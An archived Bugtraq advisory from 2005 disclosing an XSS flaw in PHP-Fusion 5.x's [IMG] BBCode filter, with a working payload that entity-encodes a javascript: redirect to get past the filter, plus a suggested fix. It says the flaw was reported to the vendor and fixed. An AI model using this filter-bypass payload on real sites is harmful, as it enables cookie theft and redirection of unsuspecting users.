Bugtraq mailing list archives

PHP-FUSION 5.* XSS VULNERABILITY


From: FireSt0rm <firest0rm.uh () gmail com>
Date: 6 Mar 2005 16:58:45 -0000



I found an exploit in the current version of php-fusion which allows you to input XSS in the [IMG] tag. I reported it 
already to php-fusion and they created a fix for this. Here it goes:

By converting the text (ie. javascript:alert('test')) to their ascii values, the strings between the [img][/img] tags 
aren't checked by the filter. And this way, you can send it and it will be executed.

You can do other things like display cookies, steal cookies, redirections etc.

EXAMPLE:

[IMG]javascript:document.location='http://www.albinoblacksheep.com/flash/you.html'[/IMG]

would be replaced by

[IMG]&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#100&#111&#99&#117&#109&#101&#110&#116&#46&#108&#111&#99&#97&#116&#105&#111&#110&#61&#39&#104&#116&#116&#112&#58&#47&#47&#119&#119&#119&#46&#97&#108&#98&#105&#110&#111&#98&#108&#97&#99&#107&#115&#104&#101&#101&#112&#46&#99&#111&#109&#47&#102&#108&#97&#115&#104&#47&#121&#111&#117&#46&#104&#116&#109&#108&#39[/IMG]

FIX:

Filter out characters like '&' and '#'.


Current thread: